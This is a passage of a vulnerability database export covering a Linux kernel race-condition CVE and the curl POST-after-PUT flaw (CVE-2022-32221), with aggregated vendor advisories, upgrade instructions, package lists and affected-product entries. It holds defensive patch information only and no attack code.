"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-35524"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-16135"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-13751"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-17595"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-20266"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-27645"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-33194"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-25013"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-22925"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-22898"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-36087"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-13751"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-36330"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-20838"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3778"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-20284"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-31535"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-35942"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-12762"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-25014"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14615"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3481"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-13435"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-36086"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-14145"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-35523"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-28153"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-20232"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-33560"
},
{
"trust": 0.1,
"url": "https://docs.openshift.com/container-platform/4.7/logging/cluster-logging-upgrading.html"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3796"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-25010"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-18218"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-5827"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-36084"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-18218"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:4627"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-25012"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2021-23133"
},
{
"db": "PACKETSTORM",
"id": "164875"
},
{
"db": "PACKETSTORM",
"id": "164837"
},
{
"db": "PACKETSTORM",
"id": "163249"
},
{
"db": "PACKETSTORM",
"id": "163251"
},
{
"db": "PACKETSTORM",
"id": "163253"
},
{
"db": "PACKETSTORM",
"id": "163255"
},
{
"db": "PACKETSTORM",
"id": "163262"
},
{
"db": "PACKETSTORM",
"id": "163291"
},
{
"db": "PACKETSTORM",
"id": "163301"
},
{
"db": "PACKETSTORM",
"id": "164967"
},
{
"db": "CNNVD",
"id": "CNNVD-202104-1348"
},
{
"db": "NVD",
"id": "CVE-2021-23133"
}
]
},
"sources": {
"_id": null,
"data": [
{
"db": "VULMON",
"id": "CVE-2021-23133",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "164875",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "164837",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "163249",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "163251",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "163253",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "163255",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "163262",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "163291",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "163301",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "164967",
"ident": null
},
{
"db": "CNNVD",
"id": "CNNVD-202104-1348",
"ident": null
},
{
"db": "NVD",
"id": "CVE-2021-23133",
"ident": null
}
]
},
"sources_release_date": {
"_id": null,
"data": [
{
"date": "2021-04-22T00:00:00",
"db": "VULMON",
"id": "CVE-2021-23133",
"ident": null
},
{
"date": "2021-11-10T17:10:23",
"db": "PACKETSTORM",
"id": "164875",
"ident": null
},
{
"date": "2021-11-10T17:04:39",
"db": "PACKETSTORM",
"id": "164837",
"ident": null
},
{
"date": "2021-06-23T15:33:13",
"db": "PACKETSTORM",
"id": "163249",
"ident": null
},
{
"date": "2021-06-23T15:35:21",
"db": "PACKETSTORM",
"id": "163251",
"ident": null
},
{
"date": "2021-06-23T15:38:23",
"db": "PACKETSTORM",
"id": "163253",
"ident": null
},
{
"date": "2021-06-23T15:41:26",
"db": "PACKETSTORM",
"id": "163255",
"ident": null
},
{
"date": "2021-06-23T15:48:14",
"db": "PACKETSTORM",
"id": "163262",
"ident": null
},
{
"date": "2021-06-27T12:22:22",
"db": "PACKETSTORM",
"id": "163291",
"ident": null
},
{
"date": "2021-06-28T16:22:26",
"db": "PACKETSTORM",
"id": "163301",
"ident": null
},
{
"date": "2021-11-15T17:25:56",
"db": "PACKETSTORM",
"id": "164967",
"ident": null
},
{
"date": "2021-04-19T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202104-1348",
"ident": null
},
{
"date": "2021-04-22T18:15:08.123000",
"db": "NVD",
"id": "CVE-2021-23133",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2021-05-10T00:00:00",
"db": "VULMON",
"id": "CVE-2021-23133",
"ident": null
},
{
"date": "2021-12-16T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202104-1348",
"ident": null
},
{
"date": "2024-11-21T05:51:16.080000",
"db": "NVD",
"id": "CVE-2021-23133",
"ident": null
}
]
},
"threat_type": {
"_id": null,
"data": "local",
"sources": [
{
"db": "PACKETSTORM",
"id": "163249"
},
{
"db": "PACKETSTORM",
"id": "163251"
},
{
"db": "PACKETSTORM",
"id": "163253"
},
{
"db": "PACKETSTORM",
"id": "163255"
},
{
"db": "PACKETSTORM",
"id": "163262"
},
{
"db": "PACKETSTORM",
"id": "163291"
},
{
"db": "PACKETSTORM",
"id": "163301"
},
{
"db": "CNNVD",
"id": "CNNVD-202104-1348"
}
],
"trust": 1.3
},
"title": {
"_id": null,
"data": "Linux kernel Competitive conditional vulnerability",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202104-1348"
}
],
"trust": 0.6
},
"type": {
"_id": null,
"data": "arbitrary",
"sources": [
{
"db": "PACKETSTORM",
"id": "163249"
},
{
"db": "PACKETSTORM",
"id": "163251"
},
{
"db": "PACKETSTORM",
"id": "163253"
},
{
"db": "PACKETSTORM",
"id": "163255"
},
{
"db": "PACKETSTORM",
"id": "163262"
},
{
"db": "PACKETSTORM",
"id": "163291"
},
{
"db": "PACKETSTORM",
"id": "163301"
}
],
"trust": 0.7
}
}
VAR-202210-1888
Vulnerability from variot - Updated: 2026-04-10 22:55
When doing HTTP(S) transfers, libcurl might erroneously use the read callback (CURLOPT_READFUNCTION) to ask for data to send, even when the CURLOPT_POSTFIELDS option has been set, if the same handle previously was used to issue a PUT request which used that callback. This flaw may surprise the application and cause it to misbehave and either send off the wrong data or use memory after free or similar in the subsequent POST request. The problem exists in the logic for a reused handle when it is changed from a PUT to a POST. (CVE-2022-32221). ==========================================================================
Ubuntu Security Notice USN-5702-1
October 26, 2022
curl vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 22.10
- Ubuntu 22.04 LTS
- Ubuntu 20.04 LTS
- Ubuntu 18.04 LTS
Summary:
Several security issues were fixed in curl.
Software Description:
- curl: HTTP, HTTPS, and FTP client and client libraries
Details:
Robby Simpson discovered that curl incorrectly handled certain POST operations after PUT operations. (CVE-2022-32221)
Hiroki Kurosawa discovered that curl incorrectly handled parsing .netrc files. If an attacker were able to provide a specially crafted .netrc file, this issue could cause curl to crash, resulting in a denial of service. This issue only affected Ubuntu 22.10. (CVE-2022-35260)
It was discovered that curl incorrectly handled certain HTTP proxy return codes. A remote attacker could use this issue to cause curl to crash, resulting in a denial of service, or possibly execute arbitrary code. This issue only affected Ubuntu 22.04 LTS, and Ubuntu 22.10. (CVE-2022-42915)
Hiroki Kurosawa discovered that curl incorrectly handled HSTS support when certain hostnames included IDN characters. A remote attacker could possibly use this issue to cause curl to use unencrypted connections. This issue only affected Ubuntu 22.04 LTS, and Ubuntu 22.10. (CVE-2022-42916)
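The reused-handle flaw fixed here (CVE-2022-32221) is a case of per-request state surviving handle reuse. As a rough illustration of the bug class, the following toy Python model (hypothetical names, not the libcurl C API) shows why setting POST fields on a handle must invalidate a read callback installed for an earlier PUT; otherwise the next request sends stale data:

```python
class Handle:
    """Toy model of a reusable transfer handle.

    Hypothetical illustration of the CVE-2022-32221 bug class;
    this is not the libcurl API.
    """

    def __init__(self):
        self.read_callback = None   # set for PUT-style uploads
        self.postfields = None      # set for simple POST bodies

    def set_read_function(self, cb):
        self.read_callback = cb

    def set_postfields(self, data):
        self.postfields = data
        # The essence of the fix: switching the handle to POST fields
        # must invalidate any read callback left over from a prior PUT.
        self.read_callback = None

    def request_body(self):
        # The buggy logic consulted a stale read_callback here even
        # after postfields had been set, sending the wrong data.
        if self.read_callback is not None:
            return self.read_callback()
        return self.postfields


h = Handle()
h.set_read_function(lambda: b"contents of the PUT upload")  # first transfer: PUT
h.set_postfields(b"name=value")                             # handle reused for POST
print(h.request_body())  # b'name=value', not the stale PUT data
```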
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 22.10:
  curl 7.85.0-1ubuntu0.1
  libcurl3-gnutls 7.85.0-1ubuntu0.1
  libcurl3-nss 7.85.0-1ubuntu0.1
  libcurl4 7.85.0-1ubuntu0.1

Ubuntu 22.04 LTS:
  curl 7.81.0-1ubuntu1.6
  libcurl3-gnutls 7.81.0-1ubuntu1.6
  libcurl3-nss 7.81.0-1ubuntu1.6
  libcurl4 7.81.0-1ubuntu1.6

Ubuntu 20.04 LTS:
  curl 7.68.0-1ubuntu2.14
  libcurl3-gnutls 7.68.0-1ubuntu2.14
  libcurl3-nss 7.68.0-1ubuntu2.14
  libcurl4 7.68.0-1ubuntu2.14

Ubuntu 18.04 LTS:
  curl 7.58.0-2ubuntu3.21
  libcurl3-gnutls 7.58.0-2ubuntu3.21
  libcurl3-nss 7.58.0-2ubuntu3.21
  libcurl4 7.58.0-2ubuntu3.21
In general, a standard system update will make all the necessary changes.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 202212-01
https://security.gentoo.org/
Severity: High
Title: curl: Multiple Vulnerabilities
Date: December 19, 2022
Bugs: #803308, #813270, #841302, #843824, #854708, #867679, #878365
ID: 202212-01
Synopsis
Multiple vulnerabilities have been found in curl, the worst of which could result in arbitrary code execution.
Background
A command line tool and library for transferring data with URLs.
Affected packages
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-misc/curl < 7.86.0 >= 7.86.0
Description
Multiple vulnerabilities have been discovered in curl. Please review the CVE identifiers referenced below for details.
Impact
Please review the referenced CVE identifiers for details.
Workaround
There is no known workaround at this time.
Resolution
All curl users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=net-misc/curl-7.86.0"
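The vulnerable/unaffected boundary in the table above (anything below 7.86.0) can be checked mechanically. A minimal Python sketch, where `parse_version` and the version strings are illustrative; note it ignores distribution backports, which fix these CVEs in packages that keep older version numbers:

```python
def parse_version(v: str) -> tuple:
    """Turn a dotted version string like '7.85.0' into comparable ints."""
    return tuple(int(part) for part in v.split("."))

# First unaffected upstream release per the affected-packages table above.
FIXED = parse_version("7.86.0")

def is_vulnerable(installed: str) -> bool:
    # Strictly below the fixed release -> in the affected range.
    return parse_version(installed) < FIXED

print(is_vulnerable("7.85.0"))  # True
print(is_vulnerable("7.86.0"))  # False
```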
References
[ 1 ] CVE-2021-22922 https://nvd.nist.gov/vuln/detail/CVE-2021-22922
[ 2 ] CVE-2021-22923 https://nvd.nist.gov/vuln/detail/CVE-2021-22923
[ 3 ] CVE-2021-22925 https://nvd.nist.gov/vuln/detail/CVE-2021-22925
[ 4 ] CVE-2021-22926 https://nvd.nist.gov/vuln/detail/CVE-2021-22926
[ 5 ] CVE-2021-22945 https://nvd.nist.gov/vuln/detail/CVE-2021-22945
[ 6 ] CVE-2021-22946 https://nvd.nist.gov/vuln/detail/CVE-2021-22946
[ 7 ] CVE-2021-22947 https://nvd.nist.gov/vuln/detail/CVE-2021-22947
[ 8 ] CVE-2022-22576 https://nvd.nist.gov/vuln/detail/CVE-2022-22576
[ 9 ] CVE-2022-27774 https://nvd.nist.gov/vuln/detail/CVE-2022-27774
[ 10 ] CVE-2022-27775 https://nvd.nist.gov/vuln/detail/CVE-2022-27775
[ 11 ] CVE-2022-27776 https://nvd.nist.gov/vuln/detail/CVE-2022-27776
[ 12 ] CVE-2022-27779 https://nvd.nist.gov/vuln/detail/CVE-2022-27779
[ 13 ] CVE-2022-27780 https://nvd.nist.gov/vuln/detail/CVE-2022-27780
[ 14 ] CVE-2022-27781 https://nvd.nist.gov/vuln/detail/CVE-2022-27781
[ 15 ] CVE-2022-27782 https://nvd.nist.gov/vuln/detail/CVE-2022-27782
[ 16 ] CVE-2022-30115 https://nvd.nist.gov/vuln/detail/CVE-2022-30115
[ 17 ] CVE-2022-32205 https://nvd.nist.gov/vuln/detail/CVE-2022-32205
[ 18 ] CVE-2022-32206 https://nvd.nist.gov/vuln/detail/CVE-2022-32206
[ 19 ] CVE-2022-32207 https://nvd.nist.gov/vuln/detail/CVE-2022-32207
[ 20 ] CVE-2022-32208 https://nvd.nist.gov/vuln/detail/CVE-2022-32208
[ 21 ] CVE-2022-32221 https://nvd.nist.gov/vuln/detail/CVE-2022-32221
[ 22 ] CVE-2022-35252 https://nvd.nist.gov/vuln/detail/CVE-2022-35252
[ 23 ] CVE-2022-35260 https://nvd.nist.gov/vuln/detail/CVE-2022-35260
[ 24 ] CVE-2022-42915 https://nvd.nist.gov/vuln/detail/CVE-2022-42915
[ 25 ] CVE-2022-42916 https://nvd.nist.gov/vuln/detail/CVE-2022-42916
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
https://security.gentoo.org/glsa/202212-01
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.
License
Copyright 2022 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
https://creativecommons.org/licenses/by-sa/2.5

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
APPLE-SA-2023-01-23-4 macOS Ventura 13.2
macOS Ventura 13.2 addresses the following issues. Information about the security content is also available at https://support.apple.com/HT213605.
AppleMobileFileIntegrity Available for: macOS Ventura Impact: An app may be able to access user-sensitive data Description: This issue was addressed by enabling hardened runtime. CVE-2023-23499: Wojciech Reguła (@_r3ggi) of SecuRing (wojciechregula.blog)
curl Available for: macOS Ventura Impact: Multiple issues in curl Description: Multiple issues were addressed by updating to curl version 7.86.0. CVE-2022-42915 CVE-2022-42916 CVE-2022-32221 CVE-2022-35260
dcerpc Available for: macOS Ventura Impact: Mounting a maliciously crafted Samba network share may lead to arbitrary code execution Description: A buffer overflow issue was addressed with improved memory handling. CVE-2023-23513: Dimitrios Tatsis and Aleksandar Nikolic of Cisco Talos
DiskArbitration Available for: macOS Ventura Impact: An encrypted volume may be unmounted and remounted by a different user without prompting for the password Description: A logic issue was addressed with improved state management. CVE-2023-23493: Oliver Norpoth (@norpoth) of KLIXX GmbH (klixx.com)
ImageIO Available for: macOS Ventura Impact: Processing an image may lead to a denial-of-service Description: A memory corruption issue was addressed with improved state management. CVE-2023-23519: Yiğit Can YILMAZ (@yilmazcanyigit)
Intel Graphics Driver Available for: macOS Ventura Impact: An app may be able to execute arbitrary code with kernel privileges Description: The issue was addressed with improved bounds checks. CVE-2023-23507: an anonymous researcher
Kernel Available for: macOS Ventura Impact: An app may be able to leak sensitive kernel state Description: The issue was addressed with improved memory handling. CVE-2023-23500: Pan ZhenPeng (@Peterpan0927) of STAR Labs SG Pte. Ltd. (@starlabs_sg)
Kernel Available for: macOS Ventura Impact: An app may be able to determine kernel memory layout Description: An information disclosure issue was addressed by removing the vulnerable code. CVE-2023-23502: Pan ZhenPeng (@Peterpan0927) of STAR Labs SG Pte. Ltd. (@starlabs_sg)
Kernel Available for: macOS Ventura Impact: An app may be able to execute arbitrary code with kernel privileges Description: The issue was addressed with improved memory handling. CVE-2023-23504: Adam Doupé of ASU SEFCOM
libxpc Available for: macOS Ventura Impact: An app may be able to access user-sensitive data Description: A permissions issue was addressed with improved validation. CVE-2023-23506: Guilherme Rambo of Best Buddy Apps (rambo.codes)
Mail Drafts Available for: macOS Ventura Impact: The quoted original message may be selected from the wrong email when forwarding an email from an Exchange account Description: A logic issue was addressed with improved state management. CVE-2023-23498: an anonymous researcher
Maps Available for: macOS Ventura Impact: An app may be able to bypass Privacy preferences Description: A logic issue was addressed with improved state management. CVE-2023-23503: an anonymous researcher
PackageKit Available for: macOS Ventura Impact: An app may be able to gain root privileges Description: A logic issue was addressed with improved state management. CVE-2023-23497: Mickey Jin (@patch1t)
Safari Available for: macOS Ventura Impact: An app may be able to access a user’s Safari history Description: A permissions issue was addressed with improved validation. CVE-2023-23510: Guilherme Rambo of Best Buddy Apps (rambo.codes)
Safari Available for: macOS Ventura Impact: Visiting a website may lead to an app denial-of-service Description: The issue was addressed with improved handling of caches. CVE-2023-23512: Adriatik Raci
Screen Time Available for: macOS Ventura Impact: An app may be able to access information about a user’s contacts Description: A privacy issue was addressed with improved private data redaction for log entries. CVE-2023-23505: Wojciech Reguła of SecuRing (wojciechregula.blog)
Vim Available for: macOS Ventura Impact: Multiple issues in Vim Description: A use after free issue was addressed with improved memory management. CVE-2022-3705
Weather Available for: macOS Ventura Impact: An app may be able to bypass Privacy preferences Description: The issue was addressed with improved memory handling. CVE-2023-23511: Wojciech Regula of SecuRing (wojciechregula.blog), an anonymous researcher
WebKit Available for: macOS Ventura Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: The issue was addressed with improved checks. WebKit Bugzilla: 245464 CVE-2023-23496: ChengGang Wu, Yan Kang, YuHao Hu, Yue Sun, Jiming Wang, JiKai Ren and Hang Shu of Institute of Computing Technology, Chinese Academy of Sciences
WebKit Available for: macOS Ventura Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: The issue was addressed with improved memory handling. WebKit Bugzilla: 248268 CVE-2023-23518: YeongHyeon Choi (@hyeon101010), Hyeon Park (@tree_segment), SeOk JEON (@_seokjeon), YoungSung Ahn (@_ZeroSung), JunSeo Bae (@snakebjs0107), Dohyun Lee (@l33d0hyun) of Team ApplePIE WebKit Bugzilla: 248268 CVE-2023-23517: YeongHyeon Choi (@hyeon101010), Hyeon Park (@tree_segment), SeOk JEON (@_seokjeon), YoungSung Ahn (@_ZeroSung), JunSeo Bae (@snakebjs0107), Dohyun Lee (@l33d0hyun) of Team ApplePIE
Wi-Fi Available for: macOS Ventura Impact: An app may be able to disclose kernel memory Description: The issue was addressed with improved memory handling. CVE-2023-23501: Pan ZhenPeng (@Peterpan0927) of STAR Labs SG Pte. Ltd. (@starlabs_sg)
Windows Installer Available for: macOS Ventura Impact: An app may be able to bypass Privacy preferences Description: The issue was addressed with improved memory handling. CVE-2023-23508: Mickey Jin (@patch1t)
Additional recognition
Bluetooth We would like to acknowledge an anonymous researcher for their assistance.
Kernel We would like to acknowledge Nick Stenning of Replicate for their assistance.
Shortcuts We would like to acknowledge Baibhav Anand Jha from ReconWithMe and Cristian Dinca of Tudor Vianu National High School of Computer Science, Romania for their assistance.
WebKit We would like to acknowledge Eliya Stein of Confiant for their assistance.
macOS Ventura 13.2 may be obtained from the Mac App Store or Apple's Software Downloads web site: https://support.apple.com/downloads/ All information is also posted on the Apple Security Updates web site: https://support.apple.com/en-us/HT201222.
This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/
.
Software Description:
- mysql-8.0: MySQL database
- mysql-5.7: MySQL database
Details:
Multiple security issues were discovered in MySQL and this update includes new upstream MySQL versions to fix these issues.
In addition to security fixes, the updated packages contain bug fixes, new features, and possibly incompatible changes. In general, a standard system update will make all the necessary changes.
For the stable distribution (bullseye), these problems have been fixed in version 7.74.0-1.3+deb11u5. This update also revises the fix for CVE-2022-27774 released in DSA-5197-1.
We recommend that you upgrade your curl packages.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
=====================================================================
                   Red Hat Security Advisory

Synopsis:          Moderate: curl security update
Advisory ID:       RHSA-2023:4139-01
Product:           Red Hat Enterprise Linux
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4139
Issue date:        2023-07-18
CVE Names:         CVE-2022-32221 CVE-2023-23916
=====================================================================
- Summary:
An update for curl is now available for Red Hat Enterprise Linux 9.0 Extended Update Support.
Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

- Relevant releases/architectures:
Red Hat Enterprise Linux AppStream EUS (v.9.0) - aarch64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux BaseOS EUS (v.9.0) - aarch64, ppc64le, s390x, x86_64
- Description:
The curl packages provide the libcurl library and the curl utility for downloading files from servers using various protocols, including HTTP, FTP, and LDAP.
Security Fix(es):
* curl: POST following PUT confusion (CVE-2022-32221)

* curl: HTTP multi-header compression denial of service (CVE-2023-23916)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

- Solution:
For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/11258
- Bugs fixed (https://bugzilla.redhat.com/):
2135411 - CVE-2022-32221 curl: POST following PUT confusion
2167815 - CVE-2023-23916 curl: HTTP multi-header compression denial of service
- Package List:
Red Hat Enterprise Linux AppStream EUS (v.9.0):
aarch64: curl-debuginfo-7.76.1-14.el9_0.6.aarch64.rpm curl-debugsource-7.76.1-14.el9_0.6.aarch64.rpm curl-minimal-debuginfo-7.76.1-14.el9_0.6.aarch64.rpm libcurl-debuginfo-7.76.1-14.el9_0.6.aarch64.rpm libcurl-devel-7.76.1-14.el9_0.6.aarch64.rpm libcurl-minimal-debuginfo-7.76.1-14.el9_0.6.aarch64.rpm
ppc64le: curl-debuginfo-7.76.1-14.el9_0.6.ppc64le.rpm curl-debugsource-7.76.1-14.el9_0.6.ppc64le.rpm curl-minimal-debuginfo-7.76.1-14.el9_0.6.ppc64le.rpm libcurl-debuginfo-7.76.1-14.el9_0.6.ppc64le.rpm libcurl-devel-7.76.1-14.el9_0.6.ppc64le.rpm libcurl-minimal-debuginfo-7.76.1-14.el9_0.6.ppc64le.rpm
s390x: curl-debuginfo-7.76.1-14.el9_0.6.s390x.rpm curl-debugsource-7.76.1-14.el9_0.6.s390x.rpm curl-minimal-debuginfo-7.76.1-14.el9_0.6.s390x.rpm libcurl-debuginfo-7.76.1-14.el9_0.6.s390x.rpm libcurl-devel-7.76.1-14.el9_0.6.s390x.rpm libcurl-minimal-debuginfo-7.76.1-14.el9_0.6.s390x.rpm
x86_64: curl-debuginfo-7.76.1-14.el9_0.6.i686.rpm curl-debuginfo-7.76.1-14.el9_0.6.x86_64.rpm curl-debugsource-7.76.1-14.el9_0.6.i686.rpm curl-debugsource-7.76.1-14.el9_0.6.x86_64.rpm curl-minimal-debuginfo-7.76.1-14.el9_0.6.i686.rpm curl-minimal-debuginfo-7.76.1-14.el9_0.6.x86_64.rpm libcurl-debuginfo-7.76.1-14.el9_0.6.i686.rpm libcurl-debuginfo-7.76.1-14.el9_0.6.x86_64.rpm libcurl-devel-7.76.1-14.el9_0.6.i686.rpm libcurl-devel-7.76.1-14.el9_0.6.x86_64.rpm libcurl-minimal-debuginfo-7.76.1-14.el9_0.6.i686.rpm libcurl-minimal-debuginfo-7.76.1-14.el9_0.6.x86_64.rpm
Red Hat Enterprise Linux BaseOS EUS (v.9.0):
Source: curl-7.76.1-14.el9_0.6.src.rpm
aarch64: curl-7.76.1-14.el9_0.6.aarch64.rpm curl-debuginfo-7.76.1-14.el9_0.6.aarch64.rpm curl-debugsource-7.76.1-14.el9_0.6.aarch64.rpm curl-minimal-7.76.1-14.el9_0.6.aarch64.rpm curl-minimal-debuginfo-7.76.1-14.el9_0.6.aarch64.rpm libcurl-7.76.1-14.el9_0.6.aarch64.rpm libcurl-debuginfo-7.76.1-14.el9_0.6.aarch64.rpm libcurl-minimal-7.76.1-14.el9_0.6.aarch64.rpm libcurl-minimal-debuginfo-7.76.1-14.el9_0.6.aarch64.rpm
ppc64le: curl-7.76.1-14.el9_0.6.ppc64le.rpm curl-debuginfo-7.76.1-14.el9_0.6.ppc64le.rpm curl-debugsource-7.76.1-14.el9_0.6.ppc64le.rpm curl-minimal-7.76.1-14.el9_0.6.ppc64le.rpm curl-minimal-debuginfo-7.76.1-14.el9_0.6.ppc64le.rpm libcurl-7.76.1-14.el9_0.6.ppc64le.rpm libcurl-debuginfo-7.76.1-14.el9_0.6.ppc64le.rpm libcurl-minimal-7.76.1-14.el9_0.6.ppc64le.rpm libcurl-minimal-debuginfo-7.76.1-14.el9_0.6.ppc64le.rpm
s390x: curl-7.76.1-14.el9_0.6.s390x.rpm curl-debuginfo-7.76.1-14.el9_0.6.s390x.rpm curl-debugsource-7.76.1-14.el9_0.6.s390x.rpm curl-minimal-7.76.1-14.el9_0.6.s390x.rpm curl-minimal-debuginfo-7.76.1-14.el9_0.6.s390x.rpm libcurl-7.76.1-14.el9_0.6.s390x.rpm libcurl-debuginfo-7.76.1-14.el9_0.6.s390x.rpm libcurl-minimal-7.76.1-14.el9_0.6.s390x.rpm libcurl-minimal-debuginfo-7.76.1-14.el9_0.6.s390x.rpm
x86_64: curl-7.76.1-14.el9_0.6.x86_64.rpm curl-debuginfo-7.76.1-14.el9_0.6.i686.rpm curl-debuginfo-7.76.1-14.el9_0.6.x86_64.rpm curl-debugsource-7.76.1-14.el9_0.6.i686.rpm curl-debugsource-7.76.1-14.el9_0.6.x86_64.rpm curl-minimal-7.76.1-14.el9_0.6.x86_64.rpm curl-minimal-debuginfo-7.76.1-14.el9_0.6.i686.rpm curl-minimal-debuginfo-7.76.1-14.el9_0.6.x86_64.rpm libcurl-7.76.1-14.el9_0.6.i686.rpm libcurl-7.76.1-14.el9_0.6.x86_64.rpm libcurl-debuginfo-7.76.1-14.el9_0.6.i686.rpm libcurl-debuginfo-7.76.1-14.el9_0.6.x86_64.rpm libcurl-minimal-7.76.1-14.el9_0.6.i686.rpm libcurl-minimal-7.76.1-14.el9_0.6.x86_64.rpm libcurl-minimal-debuginfo-7.76.1-14.el9_0.6.i686.rpm libcurl-minimal-debuginfo-7.76.1-14.el9_0.6.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2022-32221 https://access.redhat.com/security/cve/CVE-2023-23916 https://access.redhat.com/security/updates/classification/#moderate
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2023 Red Hat, Inc
{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "11.0"
},
{
"_id": null,
"model": "universal forwarder",
"scope": "lt",
"trust": 1.0,
"vendor": "splunk",
"version": "8.2.12"
},
{
"_id": null,
"model": "h300s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h700s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h410s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "curl",
"scope": "lt",
"trust": 1.0,
"vendor": "haxx",
"version": "7.86.0"
},
{
"_id": null,
"model": "universal forwarder",
"scope": "gte",
"trust": 1.0,
"vendor": "splunk",
"version": "8.2.0"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "10.0"
},
{
"_id": null,
"model": "universal forwarder",
"scope": "lt",
"trust": 1.0,
"vendor": "splunk",
"version": "9.0.6"
},
{
"_id": null,
"model": "universal forwarder",
"scope": "eq",
"trust": 1.0,
"vendor": "splunk",
"version": "9.1.0"
},
{
"_id": null,
"model": "macos",
"scope": "lt",
"trust": 1.0,
"vendor": "apple",
"version": "12.6.3"
},
{
"_id": null,
"model": "h500s",
